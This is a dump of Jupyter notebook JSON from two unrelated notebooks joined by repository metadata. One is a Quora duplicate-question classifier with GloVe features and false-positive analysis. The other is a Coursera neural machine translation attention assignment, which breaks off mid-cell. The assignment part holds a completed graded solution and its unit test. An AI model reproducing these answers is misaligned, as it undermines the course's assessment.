"embeddings_index = {}\nwith open('glove.840B.300d.txt', encoding='utf-8') as f:\n for line in f:\n values = line.split(' ')\n word = values[0]\n embedding = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = embedding",
"_____no_output_____"
],
[
"def sent2vec(s):\n words = str(s).lower()\n words = word_tokenize(words)\n words = [w for w in words if not w in stop_words]\n words = [w for w in words if w.isalpha()]\n M = []\n for w in words:\n try:\n M.append(embeddings_index[w])\n except:\n M.append(np.zeros((1, 300)))\n M = np.array(M)\n v = M.sum(axis=0)\n return v / np.sqrt((v ** 2).sum())",
"_____no_output_____"
],
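[
"# Illustrative check (added): near-duplicate questions should end up with a\n# small embedding cosine distance. Assumes the GloVe cell above has run;\n# the two questions are made up.\nv1 = sent2vec('How do I learn Python?')\nv2 = sent2vec('What is the best way to learn Python?')\nprint(cosine(np.nan_to_num(v1), np.nan_to_num(v2)))  # closer to 0 means more similar",
"_____no_output_____"
],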
[
"def wrapper(train_set):\n\n #Preprocessing questions\n train_set['question1'] = train_set['question1'].apply(preprocess)\n train_set['question2'] = train_set['question2'].apply(preprocess)\n\n #JA\n train_set['common_words_ratio'] = train_set.apply(num_common_words_ratio, axis=1)\n train_set['common_tokens_ratio'] = train_set.apply(common_tokens_ratio_max, axis=1)\n train_set['fuzz_partial_ratio'] = train_set.apply(fuzz_partial_ratio, axis=1)\n train_set['min_longest_substring'] = train_set.apply(min_longest_substring, axis=1)\n\n #Penn Han\n train_set[\"unique_words_count\"] = train_set.apply(unique_words_count, axis=1)\n train_set[\"common_token_ratio_min\"] = train_set.apply(common_token_ratio_min, axis=1)\n train_set[\"fuzz_ratio\"] = train_set.apply(fuzz_ratio, axis=1)\n train_set[\"abs_len_difference\"] = train_set.apply(abs_len_difference, axis=1)\n\n #train_set[\"tfidf_matrix_q1\"] = train_set.apply(mean_tfidf_value_q1, axis=1)\n #train_set[\"tfidf_matrix_q2\"] = train_set.apply(mean_tfidf_value_q2, axis=1)\n #train_set[\"mean_idfweighted_vector_q1\"] = train_set.apply(mean_idfweighted_vector_q1, axis=1)\n #train_set[\"mean_idfweighted_vector_q2\"] = train_set.apply(mean_idfweighted_vector_q2, axis=1)\n\n #Jeremy\n train_set['common_stop_words_min'] = train_set.apply(calc_common_stop_words_min, axis=1)\n train_set['common_nouns_min'] = train_set.apply(calc_common_nouns_min, axis=1)\n train_set['mean_len'] = train_set.apply(mean_len_qns, axis=1)\n\n #KC\n train_set['common_stop_words_max'] = train_set.apply(calc_common_stop_words_max, axis=1)\n train_set['common_nouns_max'] = train_set.apply(calc_common_nouns_max, axis=1)\n train_set['ratio_len_qn'] = train_set.apply(ratio_len_qn, axis=1)\n\n #YS\n train_set['common_word_ratio_max'] = train_set.apply(common_word_ratio_max, axis=1)\n train_set['common_adjectives_max'] = train_set.apply(common_adjectives_max, axis=1)\n train_set['fuzz_token_set_ratio'] = train_set.apply(calc_fuzz_token_set_ratio, axis=1)\n\n #Neaton\n train_set['common_words_ratio_min'] = train_set.apply(common_words_ratio_min, axis=1)\n train_set['common_adjectives_min'] = train_set.apply(common_adjectives_min, axis=1)\n train_set['fuzz_token_sort_ratio'] = train_set.apply(fuzz_token_sort_ratio, axis=1)\n train_set['max_longest_substring'] = train_set.apply(max_longest_substring, axis=1)\n\n question1_vectors = np.zeros((train_set.shape[0], 300))\n for i, q in enumerate(tqdm_notebook(train_set.question1.values)):\n question1_vectors[i, :] = sent2vec(q)\n \n question2_vectors = np.zeros((train_set.shape[0], 300))\n for i, q in enumerate(tqdm_notebook(train_set.question2.values)):\n question2_vectors[i, :] = sent2vec(q)\n \n train_set['embed_cos_dist'] = [cosine(x, y) for (x, y) in zip(np.nan_to_num(question1_vectors), np.nan_to_num(question2_vectors))]\n\n\n return train_set\n",
"_____no_output_____"
],
[
"train_set = pd.read_csv('features_with_word_embedding.csv', index_col=[0])",
"_____no_output_____"
],
[
"#features = wrapper(train_set)",
"_____no_output_____"
],
[
"SEED = 42\nTRAIN_TEST = 0.1\nMAX_WORDS = 20000\nMAX_SEQUENCE = 25\n\nY_labels = train_set[\"is_duplicate\"]\nX_features = train_set.drop(\"is_duplicate\", axis=1)\n\nX_train, X_test, y_train, y_test = train_test_split(X_features, Y_labels, test_size=TRAIN_TEST, random_state=SEED)",
"_____no_output_____"
],
[
"q1_test = X_test['question1']\nq2_test = X_test['question2']\nq1_train = X_train['question1'].astype(str)\nq2_train = X_train['question2'].astype(str)",
"_____no_output_____"
],
[
"X_test.drop(['question1', 'question2', 'qid1', 'qid2'], axis=1, inplace=True)",
"_____no_output_____"
],
[
"#dic = {'question1':[\"How to overcome fear\"], \"question2\": [\"How not to be scared\"] }\n\n#train_set = pd.DataFrame(dic)",
"_____no_output_____"
],
[
"#final_features = features.drop(['question1', 'question2'], axis=1)",
"_____no_output_____"
],
[
"id = X_test.reset_index()['id']",
"_____no_output_____"
],
[
"MAX_SEQUENCE = 25\nquestions = q1_train.tolist() + q2_train.tolist()\ntokenizer = Tokenizer(num_words=MAX_WORDS)\ntokenizer.fit_on_texts(questions)\n\nquestion1_token = tokenizer.texts_to_sequences(q1_test.tolist())\nquestion2_token = tokenizer.texts_to_sequences(q2_test.tolist())\n\nq1_prepared = pad_sequences(question1_token, maxlen=MAX_SEQUENCE)\nq2_prepared = pad_sequences(question2_token, maxlen=MAX_SEQUENCE)",
"_____no_output_____"
],
[
"q1_prepared",
"_____no_output_____"
]
],
[
[
"## Final RNN Model",
"_____no_output_____"
]
],
[
[
"incorrects = model.predict([q1_prepared, q2_prepared, X_test], verbose=1)",
"1264/1264 [==============================] - 39s 29ms/step\n"
],
[
"incorrects[incorrects > 0.5] = 1\nincorrects[incorrects <= 0.5] = 0\nflattened_incorrect = incorrects.flatten()",
"_____no_output_____"
],
[
"y_pred = flattened_incorrect",
"_____no_output_____"
],
[
"final_df = pd.DataFrame(id)\nfinal_df['Actual'] = y_test.values\nfinal_df['Pred'] = y_pred.astype(int)",
"_____no_output_____"
],
[
"wrong_class = final_df[final_df['Actual'] != final_df['Pred']]",
"_____no_output_____"
]
],
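[
[
"*Added summary (not in the original notebook):* `precision_score` and `confusion_matrix` are imported at the top but never used; a quick breakdown of the held-out predictions makes the false-positive deep dive below easier to read.",
"_____no_output_____"
],
[
"# Hedged sketch: overall error structure of the tuned model on the test split.\nprint(confusion_matrix(y_test.values, y_pred.astype(int)))  # rows: actual, cols: predicted\nprint('precision:', precision_score(y_test.values, y_pred.astype(int)))",
"_____no_output_____"
]
],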
[
[
"## Deep dive into the False Positives For Tuned Model",
"_____no_output_____"
]
],
[
[
"wrong_class",
"_____no_output_____"
],
[
"false_positives = wrong_class[wrong_class['Actual'] == 0]",
"_____no_output_____"
],
[
"false_positives",
"_____no_output_____"
],
[
"false_positives\nfalse_positives_id = false_positives['id'].values",
"_____no_output_____"
],
[
"fp_df = q1_test.reset_index()\nfp_df['question2'] = q2_test.reset_index()['question2']\nfp_df['Actual'] = y_test.values\nfp_df['Pred'] = y_pred.astype(int)",
"_____no_output_____"
],
[
"fp_df = fp_df[fp_df.id.isin(false_positives_id)]",
"_____no_output_____"
],
[
"fp_df.reset_index(inplace=True)\nfp_df = fp_df.drop(['index'], axis=1)",
"_____no_output_____"
],
[
"fp_df",
"_____no_output_____"
],
[
"fp_df.loc[0:3]",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e705e76b4b0fff8605c9bf275ea448995e814ccb | 111,844 | ipynb | Jupyter Notebook | Notebooks/Course 5 Sequence Models/Neural_machine_translation_with_attention_v4a.ipynb | JiningSong/Deep-Learning-Specialization-Study-Notes | 12c4acd500893b636758aca805fca61f35ed6784 | [
"MIT"
] | null | null | null | Notebooks/Course 5 Sequence Models/Neural_machine_translation_with_attention_v4a.ipynb | JiningSong/Deep-Learning-Specialization-Study-Notes | 12c4acd500893b636758aca805fca61f35ed6784 | [
"MIT"
] | null | null | null | Notebooks/Course 5 Sequence Models/Neural_machine_translation_with_attention_v4a.ipynb | JiningSong/Deep-Learning-Specialization-Study-Notes | 12c4acd500893b636758aca805fca61f35ed6784 | [
"MIT"
] | null | null | null | 60.950409 | 22,000 | 0.547933 | [
[
[
"# Neural Machine Translation\n\nWelcome to your first programming assignment for this week! \n\n* You will build a Neural Machine Translation (NMT) model to translate human-readable dates (\"25th of June, 2009\") into machine-readable dates (\"2009-06-25\"). \n* You will do this using an attention model, one of the most sophisticated sequence-to-sequence models. \n\nThis notebook was produced together with NVIDIA's Deep Learning Institute. ",
"_____no_output_____"
],
[
"## Table of Contents\n\n- [Packages](#0)\n- [1 - Translating Human Readable Dates Into Machine Readable Dates](#1)\n - [1.1 - Dataset](#1-1)\n- [2 - Neural Machine Translation with Attention](#2)\n - [2.1 - Attention Mechanism](#2-1)\n - [Exercise 1 - one_step_attention](#ex-1)\n - [Exercise 2 - modelf](#ex-2)\n - [Exercise 3 - Compile the Model](#ex-3)\n- [3 - Visualizing Attention (Optional / Ungraded)](#3)\n - [3.1 - Getting the Attention Weights From the Network](#3-1)",
"_____no_output_____"
],
[
"<a name='0'></a>\n## Packages",
"_____no_output_____"
]
],
[
[
"from tensorflow.keras.layers import Bidirectional, Concatenate, Permute, Dot, Input, LSTM, Multiply\nfrom tensorflow.keras.layers import RepeatVector, Dense, Activation, Lambda\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import load_model, Model\nimport tensorflow.keras.backend as K\nimport tensorflow as tf\nimport numpy as np\n\nfrom faker import Faker\nimport random\nfrom tqdm import tqdm\nfrom babel.dates import format_date\nfrom nmt_utils import *\nimport matplotlib.pyplot as plt\n%matplotlib inline",
"_____no_output_____"
]
],
[
[
"<a name='1'></a>\n## 1 - Translating Human Readable Dates Into Machine Readable Dates\n\n* The model you will build here could be used to translate from one language to another, such as translating from English to Hindi. \n* However, language translation requires massive datasets and usually takes days of training on GPUs. \n* To give you a place to experiment with these models without using massive datasets, we will perform a simpler \"date translation\" task. \n* The network will input a date written in a variety of possible formats (*e.g. \"the 29th of August 1958\", \"03/30/1968\", \"24 JUNE 1987\"*) \n* The network will translate them into standardized, machine readable dates (*e.g. \"1958-08-29\", \"1968-03-30\", \"1987-06-24\"*). \n* We will have the network learn to output dates in the common machine-readable format YYYY-MM-DD. \n\n<!-- \nTake a look at [nmt_utils.py](./nmt_utils.py) to see all the formatting. Count and figure out how the formats work, you will need this knowledge later. !--> ",
"_____no_output_____"
],
[
"<a name='1-1'></a>\n### 1.1 - Dataset\n\nWe will train the model on a dataset of 10,000 human readable dates and their equivalent, standardized, machine readable dates. Let's run the following cells to load the dataset and print some examples. ",
"_____no_output_____"
]
],
[
[
"m = 10000\ndataset, human_vocab, machine_vocab, inv_machine_vocab = load_dataset(m)",
"100%|██████████| 10000/10000 [00:00<00:00, 26051.77it/s]\n"
],
[
"dataset[:10]",
"_____no_output_____"
]
],
[
[
"You've loaded:\n- `dataset`: a list of tuples of (human readable date, machine readable date).\n- `human_vocab`: a python dictionary mapping all characters used in the human readable dates to an integer-valued index.\n- `machine_vocab`: a python dictionary mapping all characters used in machine readable dates to an integer-valued index. \n - **Note**: These indices are not necessarily consistent with `human_vocab`. \n- `inv_machine_vocab`: the inverse dictionary of `machine_vocab`, mapping from indices back to characters. \n\nLet's preprocess the data and map the raw text data into the index values. \n- We will set Tx=30 \n - We assume Tx is the maximum length of the human readable date.\n - If we get a longer input, we would have to truncate it.\n- We will set Ty=10\n - \"YYYY-MM-DD\" is 10 characters long.",
"_____no_output_____"
]
],
[
[
"Tx = 30\nTy = 10\nX, Y, Xoh, Yoh = preprocess_data(dataset, human_vocab, machine_vocab, Tx, Ty)\n\nprint(\"X.shape:\", X.shape)\nprint(\"Y.shape:\", Y.shape)\nprint(\"Xoh.shape:\", Xoh.shape)\nprint(\"Yoh.shape:\", Yoh.shape)",
"X.shape: (10000, 30)\nY.shape: (10000, 10)\nXoh.shape: (10000, 30, 37)\nYoh.shape: (10000, 10, 11)\n"
]
],
[
[
"You now have:\n- `X`: a processed version of the human readable dates in the training set.\n - Each character in X is replaced by an index (integer) mapped to the character using `human_vocab`. \n - Each date is padded to ensure a length of $T_x$ using a special character (< pad >). \n - `X.shape = (m, Tx)` where m is the number of training examples in a batch.\n- `Y`: a processed version of the machine readable dates in the training set.\n - Each character is replaced by the index (integer) it is mapped to in `machine_vocab`. \n - `Y.shape = (m, Ty)`. \n- `Xoh`: one-hot version of `X`\n - Each index in `X` is converted to the one-hot representation (if the index is 2, the one-hot version has the index position 2 set to 1, and the remaining positions are 0.\n - `Xoh.shape = (m, Tx, len(human_vocab))`\n- `Yoh`: one-hot version of `Y`\n - Each index in `Y` is converted to the one-hot representation. \n - `Yoh.shape = (m, Ty, len(machine_vocab))`. \n - `len(machine_vocab) = 11` since there are 10 numeric digits (0 to 9) and the `-` symbol.",
"_____no_output_____"
],
[
"* Let's also look at some examples of preprocessed training examples. \n* Feel free to play with `index` in the cell below to navigate the dataset and see how source/target dates are preprocessed. ",
"_____no_output_____"
]
],
[
[
"index = 0\nprint(\"Source date:\", dataset[index][0])\nprint(\"Target date:\", dataset[index][1])\nprint()\nprint(\"Source after preprocessing (indices):\", X[index])\nprint(\"Target after preprocessing (indices):\", Y[index])\nprint()\nprint(\"Source after preprocessing (one-hot):\", Xoh[index])\nprint(\"Target after preprocessing (one-hot):\", Yoh[index])",
"Source date: 27 august 1971\nTarget date: 1971-08-27\n\nSource after preprocessing (indices): [ 5 10 0 13 31 19 31 29 30 0 4 12 10 4 36 36 36 36 36 36 36 36 36 36\n 36 36 36 36 36 36]\nTarget after preprocessing (indices): [ 2 10 8 2 0 1 9 0 3 8]\n\nSource after preprocessing (one-hot): [[0. 0. 0. ... 0. 0. 0.]\n [0. 0. 0. ... 0. 0. 0.]\n [1. 0. 0. ... 0. 0. 0.]\n ...\n [0. 0. 0. ... 0. 0. 1.]\n [0. 0. 0. ... 0. 0. 1.]\n [0. 0. 0. ... 0. 0. 1.]]\nTarget after preprocessing (one-hot): [[0. 0. 1. 0. 0. 0. 0. 0. 0. 0. 0.]\n [0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 1.]\n [0. 0. 0. 0. 0. 0. 0. 0. 1. 0. 0.]\n [0. 0. 1. 0. 0. 0. 0. 0. 0. 0. 0.]\n [1. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.]\n [0. 1. 0. 0. 0. 0. 0. 0. 0. 0. 0.]\n [0. 0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]\n [1. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.]\n [0. 0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]\n [0. 0. 0. 0. 0. 0. 0. 0. 1. 0. 0.]]\n"
]
],
[
[
"<a name='2'></a>\n## 2 - Neural Machine Translation with Attention\n\n* If you had to translate a book's paragraph from French to English, you would not read the whole paragraph, then close the book and translate. \n* Even during the translation process, you would read/re-read and focus on the parts of the French paragraph corresponding to the parts of the English you are writing down. \n* The attention mechanism tells a Neural Machine Translation model where it should pay attention to at any step. \n\n<a name='2-1'></a>\n### 2.1 - Attention Mechanism\n\nIn this part, you will implement the attention mechanism presented in the lecture videos. \n* Here is a figure to remind you how the model works. \n * The diagram on the left shows the attention model. \n * The diagram on the right shows what one \"attention\" step does to calculate the attention variables $\\alpha^{\\langle t, t' \\rangle}$.\n * The attention variables $\\alpha^{\\langle t, t' \\rangle}$ are used to compute the context variable $context^{\\langle t \\rangle}$ for each timestep in the output ($t=1, \\ldots, T_y$). \n\n<table>\n<td> \n<img src=\"images/attn_model.png\" style=\"width:500;height:500px;\"> <br>\n</td> \n<td> \n<img src=\"images/attn_mechanism.png\" style=\"width:500;height:500px;\"> <br>\n</td> \n</table>\n<caption><center> **Figure 1**: Neural machine translation with attention</center></caption>\n",
"_____no_output_____"
],
[
"Here are some properties of the model that you may notice: \n\n#### Pre-attention and Post-attention LSTMs on both sides of the attention mechanism\n- There are two separate LSTMs in this model (see diagram on the left): pre-attention and post-attention LSTMs.\n- *Pre-attention* Bi-LSTM is the one at the bottom of the picture is a Bi-directional LSTM and comes *before* the attention mechanism.\n - The attention mechanism is shown in the middle of the left-hand diagram.\n - The pre-attention Bi-LSTM goes through $T_x$ time steps\n- *Post-attention* LSTM: at the top of the diagram comes *after* the attention mechanism. \n - The post-attention LSTM goes through $T_y$ time steps. \n\n- The post-attention LSTM passes the hidden state $s^{\\langle t \\rangle}$ and cell state $c^{\\langle t \\rangle}$ from one time step to the next. ",
"_____no_output_____"
],
[
"#### An LSTM has both a hidden state and cell state\n* In the lecture videos, we were using only a basic RNN for the post-attention sequence model\n * This means that the state captured by the RNN was outputting only the hidden state $s^{\\langle t\\rangle}$. \n* In this assignment, we are using an LSTM instead of a basic RNN.\n * So the LSTM has both the hidden state $s^{\\langle t\\rangle}$ and the cell state $c^{\\langle t\\rangle}$. ",
"_____no_output_____"
],
[
"#### Each time step does not use predictions from the previous time step\n* Unlike previous text generation examples earlier in the course, in this model, the post-attention LSTM at time $t$ does not take the previous time step's prediction $y^{\\langle t-1 \\rangle}$ as input.\n* The post-attention LSTM at time 't' only takes the hidden state $s^{\\langle t\\rangle}$ and cell state $c^{\\langle t\\rangle}$ as input. \n* We have designed the model this way because unlike language generation (where adjacent characters are highly correlated) there isn't as strong a dependency between the previous character and the next character in a YYYY-MM-DD date.",
"_____no_output_____"
],
[
"#### Concatenation of hidden states from the forward and backward pre-attention LSTMs\n- $\\overrightarrow{a}^{\\langle t \\rangle}$: hidden state of the forward-direction, pre-attention LSTM.\n- $\\overleftarrow{a}^{\\langle t \\rangle}$: hidden state of the backward-direction, pre-attention LSTM.\n- $a^{\\langle t \\rangle} = [\\overrightarrow{a}^{\\langle t \\rangle}, \\overleftarrow{a}^{\\langle t \\rangle}]$: the concatenation of the activations of both the forward-direction $\\overrightarrow{a}^{\\langle t \\rangle}$ and backward-directions $\\overleftarrow{a}^{\\langle t \\rangle}$ of the pre-attention Bi-LSTM. ",
"_____no_output_____"
],
[
"#### Computing \"energies\" $e^{\\langle t, t' \\rangle}$ as a function of $s^{\\langle t-1 \\rangle}$ and $a^{\\langle t' \\rangle}$\n- Recall in the lesson videos \"Attention Model\", at time 6:45 to 8:16, the definition of \"e\" as a function of $s^{\\langle t-1 \\rangle}$ and $a^{\\langle t \\rangle}$.\n - \"e\" is called the \"energies\" variable.\n - $s^{\\langle t-1 \\rangle}$ is the hidden state of the post-attention LSTM\n - $a^{\\langle t' \\rangle}$ is the hidden state of the pre-attention LSTM.\n - $s^{\\langle t-1 \\rangle}$ and $a^{\\langle t \\rangle}$ are fed into a simple neural network, which learns the function to output $e^{\\langle t, t' \\rangle}$.\n - $e^{\\langle t, t' \\rangle}$ is then used when computing the attention $a^{\\langle t, t' \\rangle}$ that $y^{\\langle t \\rangle}$ should pay to $a^{\\langle t' \\rangle}$.",
"_____no_output_____"
],
[
"- The diagram on the right of figure 1 uses a `RepeatVector` node to copy $s^{\\langle t-1 \\rangle}$'s value $T_x$ times.\n- Then it uses `Concatenation` to concatenate $s^{\\langle t-1 \\rangle}$ and $a^{\\langle t \\rangle}$.\n- The concatenation of $s^{\\langle t-1 \\rangle}$ and $a^{\\langle t \\rangle}$ is fed into a \"Dense\" layer, which computes $e^{\\langle t, t' \\rangle}$. \n- $e^{\\langle t, t' \\rangle}$ is then passed through a softmax to compute $\\alpha^{\\langle t, t' \\rangle}$.\n- Note that the diagram doesn't explicitly show variable $e^{\\langle t, t' \\rangle}$, but $e^{\\langle t, t' \\rangle}$ is above the Dense layer and below the Softmax layer in the diagram in the right half of figure 1.\n- We'll explain how to use `RepeatVector` and `Concatenation` in Keras below. ",
"_____no_output_____"
],
[
"#### Implementation Details\n \nLet's implement this neural translator. You will start by implementing two functions: `one_step_attention()` and `model()`.\n\n#### one_step_attention\n* The inputs to the one_step_attention at time step $t$ are:\n - $[a^{<1>},a^{<2>}, ..., a^{<T_x>}]$: all hidden states of the pre-attention Bi-LSTM.\n - $s^{<t-1>}$: the previous hidden state of the post-attention LSTM \n* one_step_attention computes:\n - $[\\alpha^{<t,1>},\\alpha^{<t,2>}, ..., \\alpha^{<t,T_x>}]$: the attention weights\n - $context^{ \\langle t \\rangle }$: the context vector:\n \n$$context^{<t>} = \\sum_{t' = 1}^{T_x} \\alpha^{<t,t'>}a^{<t'>}\\tag{1}$$ \n\n##### Clarifying 'context' and 'c'\n- In the lecture videos, the context was denoted $c^{\\langle t \\rangle}$\n- In the assignment, we are calling the context $context^{\\langle t \\rangle}$.\n - This is to avoid confusion with the post-attention LSTM's internal memory cell variable, which is also denoted $c^{\\langle t \\rangle}$.",
"_____no_output_____"
],
[
"<a name='ex-1'></a>\n### Exercise 1 - one_step_attention \n\nImplement `one_step_attention()`. \n\n* The function `model()` will call the layers in `one_step_attention()` $T_y$ times using a for-loop.\n* It is important that all $T_y$ copies have the same weights. \n * It should not reinitialize the weights every time. \n * In other words, all $T_y$ steps should have shared weights. \n* Here's how you can implement layers with shareable weights in Keras:\n 1. Define the layer objects in a variable scope that is outside of the `one_step_attention` function. For example, defining the objects as global variables would work.\n - Note that defining these variables inside the scope of the function `model` would technically work, since `model` will then call the `one_step_attention` function. For the purposes of making grading and troubleshooting easier, we are defining these as global variables. Note that the automatic grader will expect these to be global variables as well.\n 2. Call these objects when propagating the input.\n* We have defined the layers you need as global variables. \n * Please run the following cells to create them. \n * Please note that the automatic grader expects these global variables with the given variable names. For grading purposes, please do not rename the global variables.\n* Please check the Keras documentation to learn more about these layers. The layers are functions. Below are examples of how to call these functions.\n * [RepeatVector()](https://www.tensorflow.org/api_docs/python/tf/keras/layers/RepeatVector)\n```Python\nvar_repeated = repeat_layer(var1)\n```\n * [Concatenate()](https://www.tensorflow.org/api_docs/python/tf/keras/layers/Concatenate) \n```Python\nconcatenated_vars = concatenate_layer([var1,var2,var3])\n```\n * [Dense()](https://keras.io/layers/core/#dense) \n```Python\nvar_out = dense_layer(var_in)\n```\n * [Activation()](https://keras.io/layers/core/#activation) \n```Python\nactivation = activation_layer(var_in) \n```\n * [Dot()](https://www.tensorflow.org/api_docs/python/tf/keras/layers/Dot) \n```Python\ndot_product = dot_layer([var1,var2])\n```",
"_____no_output_____"
]
],
[
[
"# Defined shared layers as global variables\nrepeator = RepeatVector(Tx)\nconcatenator = Concatenate(axis=-1)\ndensor1 = Dense(10, activation = \"tanh\")\ndensor2 = Dense(1, activation = \"relu\")\nactivator = Activation(softmax, name='attention_weights') # We are using a custom softmax(axis = 1) loaded in this notebook\ndotor = Dot(axes = 1)",
"_____no_output_____"
],
[
"# UNQ_C1 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)\n# GRADED FUNCTION: one_step_attention\n\ndef one_step_attention(a, s_prev):\n \"\"\"\n Performs one step of attention: Outputs a context vector computed as a dot product of the attention weights\n \"alphas\" and the hidden states \"a\" of the Bi-LSTM.\n \n Arguments:\n a -- hidden state output of the Bi-LSTM, numpy-array of shape (m, Tx, 2*n_a)\n s_prev -- previous hidden state of the (post-attention) LSTM, numpy-array of shape (m, n_s)\n \n Returns:\n context -- context vector, input of the next (post-attention) LSTM cell\n \"\"\"\n \n ### START CODE HERE ###\n # Use repeator to repeat s_prev to be of shape (m, Tx, n_s) so that you can concatenate it with all hidden states \"a\" (≈ 1 line)\n s_prev = repeator(s_prev)\n # Use concatenator to concatenate a and s_prev on the last axis (≈ 1 line)\n # For grading purposes, please list 'a' first and 's_prev' second, in this order.\n concat = concatenator([a, s_prev])\n # Use densor1 to propagate concat through a small fully-connected neural network to compute the \"intermediate energies\" variable e. (≈1 lines)\n e = densor1(concat)\n # Use densor2 to propagate e through a small fully-connected neural network to compute the \"energies\" variable energies. (≈1 lines)\n energies = densor2(e)\n # Use \"activator\" on \"energies\" to compute the attention weights \"alphas\" (≈ 1 line)\n alphas = activator(energies)\n # Use dotor together with \"alphas\" and \"a\", in this order, to compute the context vector to be given to the next (post-attention) LSTM-cell (≈ 1 line)\n context = dotor([alphas, a])\n ### END CODE HERE ###\n \n return context",
"_____no_output_____"
],
[
"# UNIT TEST\ndef one_step_attention_test(target):\n\n m = 10\n Tx = 30\n n_a = 32\n n_s = 64\n #np.random.seed(10)\n a = np.random.uniform(1, 0, (m, Tx, 2 * n_a)).astype(np.float32)\n s_prev =np.random.uniform(1, 0, (m, n_s)).astype(np.float32) * 1\n context = target(a, s_prev)\n \n assert type(context) == tf.python.framework.ops.EagerTensor, \"Unexpected type. It should be a Tensor\"\n assert tuple(context.shape) == (m, 1, n_s), \"Unexpected output shape\"\n assert np.all(context.numpy() > 0), \"All output values must be > 0 in this example\"\n assert np.all(context.numpy() < 1), \"All output values must be < 1 in this example\"\n\n #assert np.allclose(context[0][0][0:5].numpy(), [0.50877404, 0.57160693, 0.45448175, 0.50074816, 0.53651875]), \"Unexpected values in the result\"\n print(\"\\033[92mAll tests passed!\")\n \none_step_attention_test(one_step_attention)",
"\u001b[92mAll tests passed!\n"
]
],
[
[
"<a name='ex-2'></a>\n### Exercise 2 - modelf\n\nImplement `modelf()` as explained in figure 1 and the instructions:\n\n* `modelf` first runs the input through a Bi-LSTM to get $[a^{<1>},a^{<2>}, ..., a^{<T_x>}]$. \n* Then, `modelf` calls `one_step_attention()` $T_y$ times using a `for` loop. At each iteration of this loop:\n - It gives the computed context vector $context^{<t>}$ to the post-attention LSTM.\n - It runs the output of the post-attention LSTM through a dense layer with softmax activation.\n - The softmax generates a prediction $\\hat{y}^{<t>}$.\n \nAgain, we have defined global layers that will share weights to be used in `modelf()`.",
"_____no_output_____"
]
],
[
[
"n_a = 32 # number of units for the pre-attention, bi-directional LSTM's hidden state 'a'\nn_s = 64 # number of units for the post-attention LSTM's hidden state \"s\"\n\n# Please note, this is the post attention LSTM cell. \npost_activation_LSTM_cell = LSTM(n_s, return_state = True) # Please do not modify this global variable.\noutput_layer = Dense(len(machine_vocab), activation=softmax)",
"_____no_output_____"
]
],
[
[
"Now you can use these layers $T_y$ times in a `for` loop to generate the outputs, and their parameters will not be reinitialized. You will have to carry out the following steps: \n\n1. Propagate the input `X` into a bi-directional LSTM.\n * [Bidirectional](https://keras.io/layers/wrappers/#bidirectional) \n * [LSTM](https://keras.io/layers/recurrent/#lstm)\n * Remember that we want the LSTM to return a full sequence instead of just the last hidden state. \n \nSample code:\n\n```Python\nsequence_of_hidden_states = Bidirectional(LSTM(units=..., return_sequences=...))(the_input_X)\n```\n \n2. Iterate for $t = 0, \\cdots, T_y-1$: \n 1. Call `one_step_attention()`, passing in the sequence of hidden states $[a^{\\langle 1 \\rangle},a^{\\langle 2 \\rangle}, ..., a^{ \\langle T_x \\rangle}]$ from the pre-attention bi-directional LSTM, and the previous hidden state $s^{<t-1>}$ from the post-attention LSTM to calculate the context vector $context^{<t>}$.\n 2. Give $context^{<t>}$ to the post-attention LSTM cell. \n - Remember to pass in the previous hidden-state $s^{\\langle t-1\\rangle}$ and cell-states $c^{\\langle t-1\\rangle}$ of this LSTM \n * This outputs the new hidden state $s^{<t>}$ and the new cell state $c^{<t>}$. \n\n Sample code:\n ```Python\n next_hidden_state, _ , next_cell_state = \n post_activation_LSTM_cell(inputs=..., initial_state=[prev_hidden_state, prev_cell_state])\n ``` \n Please note that the layer is actually the \"post attention LSTM cell\". For the purposes of passing the automatic grader, please do not modify the naming of this global variable. This will be fixed when we deploy updates to the automatic grader.\n 3. Apply a dense, softmax layer to $s^{<t>}$, get the output. \n Sample code:\n ```Python\n output = output_layer(inputs=...)\n ```\n 4. Save the output by adding it to the list of outputs.\n\n3. Create your Keras model instance.\n * It should have three inputs:\n * `X`, the one-hot encoded inputs to the model, of shape ($T_{x}, humanVocabSize)$\n * $s^{\\langle 0 \\rangle}$, the initial hidden state of the post-attention LSTM\n * $c^{\\langle 0 \\rangle}$, the initial cell state of the post-attention LSTM\n * The output is the list of outputs. \n Sample code\n ```Python\n model = Model(inputs=[...,...,...], outputs=...)\n ```",
"_____no_output_____"
]
],
[
[
